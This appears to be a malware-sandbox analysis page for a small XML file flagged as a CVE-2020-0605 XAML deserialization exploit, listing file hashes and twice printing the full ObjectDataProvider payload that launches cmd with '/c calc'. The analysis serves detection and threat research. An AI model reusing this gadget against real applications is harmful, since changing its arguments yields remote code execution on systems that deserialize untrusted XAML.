Malicious
Malicious

xdfa66.xml

Unknown
|
MD5: d5c60ba4bb1bbe83738349aacadf0556
|
Size: 659 B

CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
d5c60ba4bb1bbe83738349aacadf0556
Sha1
3f6290b861797d4295de603750afb58a25dc4b57
Sha256
b42a3904df46075212bb583cd3c937d90eae17c4e1337401c7182da32699912d
Sha384
65ce162bd4a89fe42f939b9d2f2d2e2068359fa5ea12fcfc85daed9fa51de4b799729b83ace6bcce4b0e0e96f4eff1df
Sha512
9929833d0ee6e57040413c49b1433a2b1a028d803b1550d5b0a3002e5a42eaebd0c94d4e4cc91f34ef3b9cb0ca93dcfcf9f5a4a99538ec399f346e5f12e560fb
SSDeep
12:yY24+DJKhL7a60+DJ+yYPeAffGAHXofaWbofiWLsKWF8CNhf/WLsJf/WbofUHXo3:yr4+4hSP+y/3oCWXWpWFbnWqnWr3o0o
TLSH
4001AC950AEE9C50C8FD49437EB0E803EC420017A6DAE5A034EC838F5F39E808507AF3
File Structure
xdfa66.xml
CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Malicious
Malware Configuration - XAML RCE Payload
Config. Field
 Value
Command

cmd
Arguments

/c calc
Artefacts
Name
 Value
XAML Embedded ObjectDataProvider

<ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>
xdfa66.xml (659 B)
File Structure
xdfa66.xml
CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Malicious
Characteristics
Malware Configuration - XAML RCE Payload
Config. Field
 Value
Command

cmd
Arguments

/c calc
Artefacts
Name
 Value Location
XAML Embedded ObjectDataProvider

<ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>

Malicious

xdfa66.xml
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙